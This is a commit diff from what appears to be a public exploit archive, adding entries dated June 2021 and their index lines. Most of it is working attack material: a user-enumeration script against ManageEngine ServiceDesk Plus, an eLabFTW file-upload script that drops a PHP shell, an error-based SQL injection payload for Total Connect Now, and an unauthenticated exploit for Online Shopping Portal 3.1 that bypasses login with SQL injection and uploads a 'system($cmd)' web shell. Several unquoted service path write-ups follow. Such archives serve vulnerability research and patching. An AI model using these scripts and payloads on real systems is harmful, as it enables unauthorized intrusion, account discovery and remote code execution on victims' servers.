DB: 2021-06-18

9 changes to exploits/shellcodes Sync Breeze 13.6.18 - 'Multiple' Unquoted Service Path Disk Savvy 13.6.14 - 'Multiple' Unquoted Service Path Dup Scout 13.5.28 - 'Multiple' Unquoted Service Path VX Search 13.5.28 - 'Multiple' Unquoted Service Path Workspace ONE Intelligent Hub 20.3.8.0 - 'VMware Hub Health Monitoring Service' Unquoted Service Path Unified Office Total Connect Now 1.0 - 'data' SQL Injection Zoho ManageEngine ServiceDesk Plus MSP 9.4 - User Enumeration Online Shopping Portal 3.1 - Remote Code Execution (Unauthenticated)
2021-06-18 05:01:58 +00:00 · 2021-06-18 05:01:58 +00:00 · db4eeaac41
commit db4eeaac41
parent 3a3618bb18
10 changed files with 412 additions and 37 deletions
--- a/exploits/java/webapps/50027.py
+++ b/exploits/java/webapps/50027.py
@ -0,0 +1,60 @@
+# Exploit Title: Zoho ManageEngine ServiceDesk Plus MSP 9.4 - User Enumeration 
+# Date: 17/06/2021
+# Exploit Author: Ricardo Ruiz (@ricardojoserf)
+# CVE: CVE-2021-31159 (https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-31159)
+# Vendor Homepage: https://www.manageengine.com
+# Vendor Confirmation: https://www.manageengine.com/products/service-desk-msp/readme.html#10519
+# Version: Previous to build 10519
+# Tested on: Zoho ManageEngine ServiceDesk Plus 9.4
+# Example: python3 exploit.py -t http://example.com/ -d DOMAIN -u USERSFILE [-o OUTPUTFILE]
+# Repository (for updates and fixing bugs): https://github.com/ricardojoserf/CVE-2021-31159
+
+import argparse
+import requests
+import urllib3
+urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
+
+
+def get_args():
+	parser = argparse.ArgumentParser()
+	parser.add_argument('-d', '--domain', required=True, action='store', help='Domain to attack')
+	parser.add_argument('-t', '--target', required=True, action='store', help='Target Url to attack')
+	parser.add_argument('-u', '--usersfile', required=True, action='store', help='Users file')	
+	parser.add_argument('-o', '--outputfile', required=False, default="listed_users.txt", action='store', help='Output file')
+	my_args = parser.parse_args()
+	return my_args
+
+
+def main():
+	args = get_args()
+	url = args.target
+	domain = args.domain
+	usersfile = args.usersfile
+	outputfile = args.outputfile
+
+	s = requests.session()
+	s.get(url)
+	resp_incorrect = s.get(url+"/ForgotPassword.sd?userName="+"nonexistentuserforsure"+"&dname="+domain, verify = False)
+	incorrect_size = len(resp_incorrect.content)
+	print("Incorrect size: %s"%(incorrect_size))
+
+	correct_users = []
+	users = open(usersfile).read().splitlines()
+	for u in users:
+			resp = s.get(url+"/ForgotPassword.sd?userName="+u+"&dname="+domain, verify = False) 
+			valid = (len(resp.content) != incorrect_size)
+			if valid:
+				correct_users.append(u)
+			print("User: %s Response size: %s (correct: %s)"%(u, len(resp.content),str(valid)))
+
+	print("\nCorrect users\n")
+	with open(outputfile, 'w') as f:
+		for user in correct_users:
+			f.write("%s\n" % user)
+			print("- %s"%(user))
+
+	print("\nResults stored in %s\n"%(outputfile))
+
+
+if __name__ == "__main__":
+    main()
--- a/exploits/php/webapps/46869.py
+++ b/exploits/php/webapps/46869.py
@ -1,33 +1,25 @@
-#!/usr/bin/env python
-#
-# Exploit Title         : eLabFTW 1.8.5 'EntityController' Arbitrary
-File Upload / RCE
+# Exploit Title         : eLabFTW 1.8.5 'EntityController' Arbitrary File Upload / RCE
 # Date                  : 5/18/19
 # Exploit Author        : liquidsky (JMcPeters)
 # Vulnerable Software   : eLabFTW 1.8.5
 # Vendor Homepage       : https://www.elabftw.net/
 # Version               : 1.8.5
 # Software Link         : https://github.com/elabftw/elabftw
-# Tested On             : Linux / PHP Version 7.0.33 / Default
-installation (Softaculous)
+# Tested On             : Linux / PHP Version 7.0.33 / Default installation (Softaculous)
 # Author Site : http://incidentsecurity.com | https://github.com/fuzzlove
 #
 # Greetz : wetw0rk, offsec ^^
 #
-# Description: eLabFTW 1.8.5 is vulnerable to arbitrary file uploads
-via the /app/controllers/EntityController.php component.
-# This may result in remote command execution. An attacker can use a
-user account to fully compromise the system using a POST request.
-# This will allow for PHP files to be written to the web root, and for
-code to execute on the remote server.
+# Description: eLabFTW 1.8.5 is vulnerable to arbitrary file uploads via the /app/controllers/EntityController.php component.
+# This may result in remote command execution. An attacker can use a user account to fully compromise the system using a POST request.
+# This will allow for PHP files to be written to the web root, and for code to execute on the remote server.
 #
-# Notes: Once this is done a php shell will drop at https://[target
-site]/[elabftw directory]/uploads/[random 2 alphanum]/[random long
-alphanumeric].php5?e=whoami
-# You will have to visit the uploads directory on the site to see what
-the name is. However there is no protection against directory listing.
+# Notes: Once this is done a php shell will drop at https://[targetsite]/[elabftw directory]/uploads/[random 2 alphanum]/[random long alphanumeric].php5?e=whoami
+# You will have to visit the uploads directory on the site to see what the name is. However there is no protection against directory listing.
 # So this can be done by an attacker remotely.

+#!/usr/bin/env python
+
 import requests
 from bs4 import BeautifulSoup as bs4
 requests.packages.urllib3.disable_warnings(requests.packages.urllib3.exceptions.InsecureRequestWarning)
@ -44,20 +36,17 @@ print "+-------------------------------------------------------------+"

 try:

-target = sys.argv[1]
-email = sys.argv[2]
-password = sys.argv[3]
-directory = sys.argv[4]
+	target = sys.argv[1]
+	email = sys.argv[2]
+	password = sys.argv[3]
+	directory = sys.argv[4]

 except IndexError:

-        print
-print "- Usage: %s <target> <email> <password> <directory>" % sys.argv[0]
-print "- Example: %s incidentsecurity.com user@email.com mypassword
-elabftw" % sys.argv[0]
-        print
-sys.exit()
+	print "- Usage: %s <target> <email> <password> <directory>" % sys.argv[0]
+	print "- Example: %s incidentsecurity.com user@email.com mypassword elabftw" % sys.argv[0]

+	sys.exit()

 proxies = {'http':'http://127.0.0.1:8080','https':'http://127.0.0.1:8080'}

@ -109,7 +98,7 @@ s = requests.Session()

 print "[*] Visiting eLabFTW Site"
 r = s.get('https://' + target + '/' + directory +
-'/login.php',verify=False, proxies=proxies)
+'/login.php',verify=False)
 print "[x]"

 # Grabbing token
@ -126,8 +115,7 @@ time.sleep(2)
 print "[*] Logging in to eLabFTW"

 r = s.post('https://' + target + '/' + directory +
-'/app/controllers/LoginController.php', data=values, verify=False,
-proxies=proxies)
+'/app/controllers/LoginController.php', data=values, verify=False)

 print "[x] Logged in :)"

@ -138,8 +126,7 @@ sessionId = s.cookies['PHPSESSID']
 headers = {
    #POST /elabftw/app/controllers/EntityController.php HTTP/1.1
    #Host: incidentsecurity.com
-    "User-Agent": "Mozilla/5.0 (X11; Linux i686; rv:52.0)
-Gecko/20100101 Firefox/52.0",
+    "User-Agent": "Mozilla/5.0 (X11; Linux i686; rv:52.0) Gecko/20100101 Firefox/52.0",
    "Accept": "application/json",
    "Accept-Language": "en-US,en;q=0.5",
    "Accept-Encoding": "gzip, deflate",
@ -147,8 +134,7 @@ Gecko/20100101 Firefox/52.0",
    "Cache-Control": "no-cache",
    "X-Requested-With": "XMLHttpRequest",
    "Content-Length": "588",
-    "Content-Type": "multipart/form-data;
-boundary=---------------------------72167598110874594111630395077",
+    "Content-Type": "multipart/form-data; boundary=---------------------------72167598110874594111630395077",
    "Connection": "close",
    "Cookie": "PHPSESSID=" + sessionId + ";" + "token=" + token
 }
@ -156,11 +142,10 @@ boundary=---------------------------72167598110874594111630395077",
 print "[*] Sending payload..."
 r = s.post('https://' + target + '/' + directory +
 '/app/controllers/EntityController.php',verify=False, headers=headers,
-data=data, proxies=proxies)
+data=data)
 print "[x] Payload sent"
 print
 print "Now check https://%s/%s/uploads" % (target, directory)
 print "Your php shell will be there under a random name (.php5)"
 print
-print "i.e https://[vulnerable
-site]/elabftw/uploads/60/6054a32461de6294843b7f7ea9ea2a34a19ca420752b087c87011144fc83f90b9aa5bdcdce5dee132584f6da45b7ec9e3841405e9d67a7d196f064116cf2da38.php5?e=whoami"
+print "i.e https://[vulnerable site]/elabftw/uploads/60/6054a32461de6294843b7f7ea9ea2a34a19ca420752b087c87011144fc83f90b9aa5bdcdce5dee132584f6da45b7ec9e3841405e9d67a7d196f064116cf2da38.php5?e=whoami"
--- a/exploits/php/webapps/50022.txt
+++ b/exploits/php/webapps/50022.txt
@ -0,0 +1,52 @@
+# Exploit Title: Unified Office Total Connect Now 1.0 – 'data' SQL Injection
+# Shodan Filter: http.title:"TCN User Dashboard"
+# Date: 06-16-2021
+# Exploit Author: Ajaikumar Nadar
+# Vendor Homepage: https://unifiedoffice.com/
+# Software Link: https://unifiedoffice.com/voip-business-solutions/
+# Version: 1.0
+# Tested on: CentOS + Apache/2.2.15
+
+POC:
+1. Go to url http://localhost/operator/operatorLogin.php and login
+2. Capture the request in Burpsuite and use the payload as given below.
+3. Observe the response which reveals the DB version of mysql.
+
+Request:
+
+POST /operator/operatorLogin.php HTTP/1.1
+Host: localhost
+Connection: close
+Content-Length: 178
+sec-ch-ua: "Chromium";v="89", ";Not A Brand";v="99"
+Accept: */*
+X-Requested-With: XMLHttpRequest
+sec-ch-ua-mobile: ?0
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36
+Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+Origin: https://localhost
+Sec-Fetch-Site: same-origin
+Sec-Fetch-Mode: cors
+Sec-Fetch-Dest: empty
+Referer: https://localhost/operator/
+Accept-Encoding: gzip, deflate
+Accept-Language: en-US,en;q=0.9
+Cookie: PHPSESSID=sosbriscgul9onu25sf2731e81
+
+data={"extension":"((select 1 from (select count(*), concat(0x3a,0x3a,(select version()),0x3a,0x3a, floor(rand()*2))a from information_schema.columns group by a)b))","pin":"bar"}
+
+
+Response:
+
+HTTP/1.1 400 Bad Request
+Date: Wed, 16 Jun 2021 12:49:56 GMT
+Server: Apache/2.2.15 (CentOS)
+X-Powered-By: PHP/5.3.10
+Expires: Thu, 19 Nov 1981 08:52:00 GMT
+Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
+Pragma: no-cache
+Content-Length: 139
+Connection: close
+Content-Type: text/html; charset=UTF-8
+
+Query failed, called from: sqlquery:/var/www/html/recpanel/operator/operatorLogin.php:62: Duplicate entry '::5.1.73::1' for key 'group_key'
--- a/exploits/php/webapps/50029.py
+++ b/exploits/php/webapps/50029.py
@ -0,0 +1,42 @@
+# Exploit Title: Online Shopping Portal 3.1 - Remote Code Execution (Unauthenticated)
+# Date: 17.06.2021
+# Exploit Author: Tagoletta (Tağmaç)
+# Software Link: https://phpgurukul.com/shopping-portal-free-download/
+# Version: V3.1
+# Tested on: Windows & Ubuntu
+
+
+import requests
+import random
+import string
+
+
+url = "http://192.168.1.3:80/shopping"
+payload= "<?php if(isset($_GET['cmd'])){ echo '<pre>'; $cmd = ($_GET['cmd']); system($cmd); echo '</pre>'; die; } ?>"
+
+session = requests.session()
+
+print("logining")
+
+request_url = url+"/admin/"
+post_data = {"username": "' OR 1=1-- a", "password": '', "submit": ''}
+session.post(request_url, data=post_data)
+
+let = string.ascii_lowercase
+shellname = ''.join(random.choice(let) for i in range(15))
+randstr = ''.join(random.choice(let) for i in range(15))
+
+print("product name is "+randstr)
+print("shell name is "+shellname)
+print("uploading payload")
+
+request_url = url+"/admin/insert-product.php"
+post_header = {"Cache-Control": "max-age=0", "Upgrade-Insecure-Requests": "1", "Content-Type": "multipart/form-data; boundary=----WebKitFormBoundaryJNYN304wDTnp1QmE", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9", "Referer": url+"/admin/insert-product.php", "Accept-Encoding": "gzip, deflate", "Connection": "close"}
+post_data = "------WebKitFormBoundaryJNYN304wDTnp1QmE\r\nContent-Disposition: form-data; name=\"category\"\r\n\r\n80\r\n------WebKitFormBoundaryJNYN304wDTnp1QmE\r\nContent-Disposition: form-data; name=\"subcategory\"\r\n\r\n8080\r\n------WebKitFormBoundaryJNYN304wDTnp1QmE\r\nContent-Disposition: form-data; name=\"productName\"\r\n\r\n"+randstr+"\r\n------WebKitFormBoundaryJNYN304wDTnp1QmE\r\nContent-Disposition: form-data; name=\"productCompany\"\r\n\r\nTagoletta\r\n------WebKitFormBoundaryJNYN304wDTnp1QmE\r\nContent-Disposition: form-data; name=\"productpricebd\"\r\n\r\nTagoletta\r\n------WebKitFormBoundaryJNYN304wDTnp1QmE\r\nContent-Disposition: form-data; name=\"productprice\"\r\n\r\nTagoletta\r\n------WebKitFormBoundaryJNYN304wDTnp1QmE\r\nContent-Disposition: form-data; name=\"productDescription\"\r\n\r\nTagoletta\r\n------WebKitFormBoundaryJNYN304wDTnp1QmE\r\nContent-Disposition: form-data; name=\"productShippingcharge\"\r\n\r\nTagoletta\r\n------WebKitFormBoundaryJNYN304wDTnp1QmE\r\nContent-Disposition: form-data; name=\"productAvailability\"\r\n\r\nIn Stock\r\n------WebKitFormBoundaryJNYN304wDTnp1QmE\r\nContent-Disposition: form-data; name=\"productimage1\"; filename=\""+shellname+".php\"\r\nContent-Type: application/octet-stream\r\n\r\n"+payload+"\r\n------WebKitFormBoundaryJNYN304wDTnp1QmE\r\nContent-Disposition: form-data; name=\"productimage2\"; filename=\""+shellname+".php\"\r\nContent-Type: application/octet-stream\r\n\r\n"+payload+"\r\n------WebKitFormBoundaryJNYN304wDTnp1QmE\r\nContent-Disposition: form-data; name=\"productimage3\"; filename=\""+shellname+".php\"\r\nContent-Type: application/octet-stream\r\n\r\n"+payload+"\r\n------WebKitFormBoundaryJNYN304wDTnp1QmE\r\nContent-Disposition: form-data; name=\"submit\"\r\n\r\n\r\n------WebKitFormBoundaryJNYN304wDTnp1QmE--\r\n"
+session.post(request_url, headers=post_header, data=post_data)
+
+request_url = url+"/search-result.php"
+post_data = {"product": randstr, "search": ''}
+shellpath = str(requests.post(request_url, data=post_data).content).split("data-echo=\"admin/productimages")[1].split(shellname+".php")[0]
+
+print("\npath of shell= "+url+"/admin/productimages"+shellpath+shellname+".php")
--- a/exploits/windows/local/50023.txt
+++ b/exploits/windows/local/50023.txt
@ -0,0 +1,50 @@
+# Exploit Title: Sync Breeze 13.6.18 - 'Multiple' Unquoted Service Path
+# Discovery by: Brian Rodriguez
+# Date: 16-06-2021
+# Vendor Homepage: https://www.syncbreeze.com/
+# Software Links:
+# https://www.syncbreeze.com/setups_x64/syncbreezesrv_setup_v13.6.18_x64.exe
+# https://www.syncbreeze.com/setups_x64/syncbreezeent_setup_v13.6.18_x64.exe
+# Tested Version: 13.6.18
+# Vulnerability Type: Unquoted Service Path
+# Tested on: Windows 10 Enterprise 64 bits
+
+# Step to discover Unquoted Service Path:
+
+C:\>wmic service get name,displayname,pathname,startmode |findstr /i "auto"
+|findstr /i /v "c:\windows\\" |findstr /i /v """
+
+Sync Breeze Server  Sync Breeze Server   C:\Program Files\Sync Breeze
+Server\bin\syncbrs.exe     Auto
+Sync Breeze Enterprise   Sync Breeze Enterprise   C:\Program Files\Sync
+Breeze Enterprise\bin\syncbrs.exe   Auto
+
+C:\Users\IEUser>sc qc "Sync Breeze Server"
+[SC] QueryServiceConfig CORRECTO
+
+NOMBRE_SERVICIO: Sync Breeze Server
+        TIPO               : 10  WIN32_OWN_PROCESS
+        TIPO_INICIO        : 2   AUTO_START
+        CONTROL_ERROR      : 0   IGNORE
+        NOMBRE_RUTA_BINARIO: C:\Program Files\Sync Breeze
+Server\bin\syncbrs.exe
+        GRUPO_ORDEN_CARGA  :
+        ETIQUETA           : 0
+        NOMBRE_MOSTRAR     : Sync Breeze Server
+        DEPENDENCIAS       :
+        NOMBRE_INICIO_SERVICIO: LocalSystem
+
+C:\Users\IEUser>sc qc "Sync Breeze Enterprise"
+[SC] QueryServiceConfig CORRECTO
+
+NOMBRE_SERVICIO: Sync Breeze Enterprise
+        TIPO               : 10  WIN32_OWN_PROCESS
+        TIPO_INICIO        : 2   AUTO_START
+        CONTROL_ERROR      : 0   IGNORE
+        NOMBRE_RUTA_BINARIO: C:\Program Files\Sync Breeze
+Enterprise\bin\syncbrs.exe
+        GRUPO_ORDEN_CARGA  :
+        ETIQUETA           : 0
+        NOMBRE_MOSTRAR     : Sync Breeze Enterprise
+        DEPENDENCIAS       :
+        NOMBRE_INICIO_SERVICIO: LocalSystem
--- a/exploits/windows/local/50024.txt
+++ b/exploits/windows/local/50024.txt
@ -0,0 +1,50 @@
+# Exploit Title: Disk Savvy 13.6.14 - 'Multiple' Unquoted Service Path
+# Discovery by: Brian Rodriguez
+# Date: 16-06-2021
+# Vendor Homepage: https://www.disksavvy.com
+# Software Links:
+# https://www.disksavvy.com/setups_x64/disksavvysrv_setup_v13.6.14_x64.exe
+# https://www.disksavvy.com/setups_x64/disksavvyent_setup_v13.6.14_x64.exe
+# Tested Version: 13.6.14
+# Vulnerability Type: Unquoted Service Path
+# Tested on: Windows 10 Enterprise 64 bits
+
+# Step to discover Unquoted Service Path:
+
+C:\>wmic service get name,displayname,pathname,startmode |findstr /i "auto"
+|findstr /i /v "c:\windows\\" |findstr /i /v """
+
+Disk Savvy Server          Disk Savvy Server   C:\Program Files\Disk Savvy
+Server\bin\disksvs.exe   Auto
+Disk Savvy Enterprise    Disk Savvy Enterprise   C:\Program Files\Disk
+Savvy Enterprise\bin\disksvs.exe   Auto
+
+C:\>sc qc "Disk Savvy Server"
+[SC] QueryServiceConfig CORRECTO
+
+NOMBRE_SERVICIO: Disk Savvy Server
+        TIPO               : 10  WIN32_OWN_PROCESS
+        TIPO_INICIO        : 2   AUTO_START
+        CONTROL_ERROR      : 0   IGNORE
+        NOMBRE_RUTA_BINARIO: C:\Program Files\Disk Savvy
+Server\bin\disksvs.exe
+        GRUPO_ORDEN_CARGA  :
+        ETIQUETA           : 0
+        NOMBRE_MOSTRAR     : Disk Savvy Server
+        DEPENDENCIAS       :
+        NOMBRE_INICIO_SERVICIO: LocalSystem
+
+C:\>sc qc "Disk Savvy Enterprise"
+[SC] QueryServiceConfig CORRECTO
+
+NOMBRE_SERVICIO: Disk Savvy Enterprise
+        TIPO               : 10  WIN32_OWN_PROCESS
+        TIPO_INICIO        : 2   AUTO_START
+        CONTROL_ERROR      : 0   IGNORE
+        NOMBRE_RUTA_BINARIO: C:\Program Files\Disk Savvy
+Enterprise\bin\disksvs.exe
+        GRUPO_ORDEN_CARGA  :
+        ETIQUETA           : 0
+        NOMBRE_MOSTRAR     : Disk Savvy Enterprise
+        DEPENDENCIAS       :
+        NOMBRE_INICIO_SERVICIO: LocalSystem
--- a/exploits/windows/local/50025.txt
+++ b/exploits/windows/local/50025.txt
@ -0,0 +1,50 @@
+# Exploit Title: Dup Scout 13.5.28 - 'Multiple' Unquoted Service Path
+# Discovery by: Brian Rodriguez
+# Date: 16-06-2021
+# Vendor Homepage: https://www.dupscout.com
+# Software Links:
+# https://www.dupscout.com/setups_x64/dupscoutsrv_setup_v13.5.28_x64.exe
+# https://www.dupscout.com/setups_x64/dupscoutent_setup_v13.5.28_x64.exe
+# Tested Version: 13.5.28
+# Vulnerability Type: Unquoted Service Path
+# Tested on: Windows 10 Enterprise 64 bits
+
+# Step to discover Unquoted Service Path:
+
+C:\>wmic service get name,displayname,pathname,startmode |findstr /i "auto"
+|findstr /i /v "c:\windows\\" |findstr /i /v """
+
+Dup Scout Server   Dup Scout Server  C:\Program Files\Dup Scout
+Server\bin\dupscts.exe    Auto
+Dup Scout Enterprise   Dup Scout Enterprise  C:\Program Files\Dup Scout
+Enterprise\bin\dupscts.exe    Auto
+
+C:\>sc qc "Dup Scout Server"
+[SC] QueryServiceConfig CORRECTO
+
+NOMBRE_SERVICIO: Dup Scout Server
+        TIPO               : 10  WIN32_OWN_PROCESS
+        TIPO_INICIO        : 2   AUTO_START
+        CONTROL_ERROR      : 0   IGNORE
+        NOMBRE_RUTA_BINARIO: C:\Program Files\Dup Scout
+Server\bin\dupscts.exe
+        GRUPO_ORDEN_CARGA  :
+        ETIQUETA           : 0
+        NOMBRE_MOSTRAR     : Dup Scout Server
+        DEPENDENCIAS       :
+        NOMBRE_INICIO_SERVICIO: LocalSystem
+
+C:\>sc qc "Dup Scout Enterprise"
+[SC] QueryServiceConfig CORRECTO
+
+NOMBRE_SERVICIO: Dup Scout Enterprise
+        TIPO               : 10  WIN32_OWN_PROCESS
+        TIPO_INICIO        : 2   AUTO_START
+        CONTROL_ERROR      : 0   IGNORE
+        NOMBRE_RUTA_BINARIO: C:\Program Files\Dup Scout
+Enterprise\bin\dupscts.exe
+        GRUPO_ORDEN_CARGA  :
+        ETIQUETA           : 0
+        NOMBRE_MOSTRAR     : Dup Scout Enterprise
+        DEPENDENCIAS       :
+        NOMBRE_INICIO_SERVICIO: LocalSystem
--- a/exploits/windows/local/50026.txt
+++ b/exploits/windows/local/50026.txt
@ -0,0 +1,50 @@
+# Exploit Title: VX Search 13.5.28 - 'Multiple' Unquoted Service Path
+# Discovery by: Brian Rodriguez
+# Date: 16-06-2021
+# Vendor Homepage: https://www.vxsearch.com
+# Software Links:
+# https://www.vxsearch.com/setups_x64/vxsearchsrv_setup_v13.5.28_x64.exe
+# https://www.vxsearch.com/setups_x64/vxsearchent_setup_v13.5.28_x64.exe
+# Tested Version: 13.5.28
+# Vulnerability Type: Unquoted Service Path
+# Tested on: Windows 10 Enterprise 64 bits
+
+# Step to discover Unquoted Service Path:
+
+C:\>wmic service get name,displayname,pathname,startmode |findstr /i "auto"
+|findstr /i /v "c:\windows\\" |findstr /i /v """
+
+VX Search Server    VX Search Server   C:\Program Files\VX Search
+Server\bin\vxsrchs.exe   Auto
+VX Search Enterprise    VX Search Enterprise   C:\Program Files\VX Search
+Enterprise\bin\vxsrchs.exe   Auto
+
+C:\>sc qc "VX Search Server"
+[SC] QueryServiceConfig CORRECTO
+
+NOMBRE_SERVICIO: VX Search Server
+        TIPO               : 10  WIN32_OWN_PROCESS
+        TIPO_INICIO        : 2   AUTO_START
+        CONTROL_ERROR      : 0   IGNORE
+        NOMBRE_RUTA_BINARIO: C:\Program Files\VX Search
+Server\bin\vxsrchs.exe
+        GRUPO_ORDEN_CARGA  :
+        ETIQUETA           : 0
+        NOMBRE_MOSTRAR     : VX Search Server
+        DEPENDENCIAS       :
+        NOMBRE_INICIO_SERVICIO: LocalSystem
+
+C:\>sc qc "VX Search Enterprise"
+[SC] QueryServiceConfig CORRECTO
+
+NOMBRE_SERVICIO: VX Search Enterprise
+        TIPO               : 10  WIN32_OWN_PROCESS
+        TIPO_INICIO        : 2   AUTO_START
+        CONTROL_ERROR      : 0   IGNORE
+        NOMBRE_RUTA_BINARIO: C:\Program Files\VX Search
+Enterprise\bin\vxsrchs.exe
+        GRUPO_ORDEN_CARGA  :
+        ETIQUETA           : 0
+        NOMBRE_MOSTRAR     : VX Search Enterprise
+        DEPENDENCIAS       :
+        NOMBRE_INICIO_SERVICIO: LocalSystem
--- a/exploits/windows/local/50028.txt
+++ b/exploits/windows/local/50028.txt
@ -0,0 +1,28 @@
+# Exploit Title: Workspace ONE Intelligent Hub 20.3.8.0 - 'VMware Hub Health Monitoring Service' Unquoted Service Path
+# Discovery by: Ismael Nava
+# Discovery Date: 06-16-2021
+# Vendor Homepage: https://www.vmware.com/mx/products/workspace-one/intelligent-hub.html
+# Software Links : https://getwsone.com/
+# Tested Version: 20.3.8.0
+# Vulnerability Type: Unquoted Service Path
+# Tested on OS: Windows 10 Enterprise 64 bits
+
+
+# Step to discover Unquoted Service Path:
+
+C:\>wmic service get name, displayname, pathname, startmode | findstr /i "Auto" | findstr /i /v "C:\Windows\\" |findstr /i /v """
+VMware Hub Health Monitoring Service	VMware Hub Health Monitoring Service	C:\Program Files (x86)\Airwatch\HealthMonitoring\Service\VMwareHubHealthMonitoring.exe	Auto
+
+C:\>sc qc "VMware Hub Health Monitoring Service"
+[SC] QueryServiceConfig CORRECTO
+
+NOMBRE_SERVICIO: VMware Hub Health Monitoring Service
+        TIPO               : 10  WIN32_OWN_PROCESS
+        TIPO_INICIO        : 2   AUTO_START
+        CONTROL_ERROR      : 1   NORMAL
+        NOMBRE_RUTA_BINARIO: C:\Program Files (x86)\Airwatch\HealthMonitoring\Service\VMwareHubHealthMonitoring.exe
+        GRUPO_ORDEN_CARGA  :
+        ETIQUETA           : 0
+        NOMBRE_MOSTRAR     : VMware Hub Health Monitoring Service
+        DEPENDENCIAS       :
+        NOMBRE_INICIO_SERVICIO: LocalSystem
--- a/files_exploits.csv
+++ b/files_exploits.csv
@ -11370,6 +11370,11 @@ id,file,description,date,author,type,platform,port
 50011,exploits/linux/local/50011.sh,"Polkit 0.105-26 0.117-2 - Local Privilege Escalation",2021-06-15,"J Smith",local,linux,
 50012,exploits/windows/local/50012.txt,"DiskPulse 13.6.14 - 'Multiple' Unquoted Service Path",2021-06-16,"Brian Rodriguez",local,windows,
 50013,exploits/windows/local/50013.txt,"Disk Sorter Server 13.6.12 - 'Disk Sorter Server' Unquoted Service Path",2021-06-16,BRushiran,local,windows,
+50023,exploits/windows/local/50023.txt,"Sync Breeze 13.6.18 - 'Multiple' Unquoted Service Path",2021-06-17,"Brian Rodriguez",local,windows,
+50024,exploits/windows/local/50024.txt,"Disk Savvy 13.6.14 - 'Multiple' Unquoted Service Path",2021-06-17,"Brian Rodriguez",local,windows,
+50025,exploits/windows/local/50025.txt,"Dup Scout 13.5.28 - 'Multiple' Unquoted Service Path",2021-06-17,"Brian Rodriguez",local,windows,
+50026,exploits/windows/local/50026.txt,"VX Search 13.5.28 - 'Multiple' Unquoted Service Path",2021-06-17,"Brian Rodriguez",local,windows,
+50028,exploits/windows/local/50028.txt,"Workspace ONE Intelligent Hub 20.3.8.0 - 'VMware Hub Health Monitoring Service' Unquoted Service Path",2021-06-17,"Ismael Nava",local,windows,
 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@ -44172,3 +44177,6 @@ id,file,description,date,author,type,platform,port
 50018,exploits/php/webapps/50018.txt,"Teachers Record Management System 1.0 - 'Multiple' SQL Injection (Authenticated)",2021-06-16,nhattruong,webapps,php,
 50019,exploits/php/webapps/50019.txt,"Teachers Record Management System 1.0 - 'email' Stored Cross-site Scripting (XSS)",2021-06-16,nhattruong,webapps,php,
 50021,exploits/php/webapps/50021.txt,"CKEditor 3 - Server-Side Request Forgery (SSRF)",2021-06-16,ahmed,webapps,php,
+50022,exploits/php/webapps/50022.txt,"Unified Office Total Connect Now 1.0 - 'data' SQL Injection",2021-06-17,"Ajaikumar Nadar",webapps,php,
+50027,exploits/java/webapps/50027.py,"Zoho ManageEngine ServiceDesk Plus MSP 9.4 - User Enumeration",2021-06-17,"Ricardo Ruiz",webapps,java,
+50029,exploits/php/webapps/50029.py,"Online Shopping Portal 3.1 - Remote Code Execution (Unauthenticated)",2021-06-17,Tagoletta,webapps,php,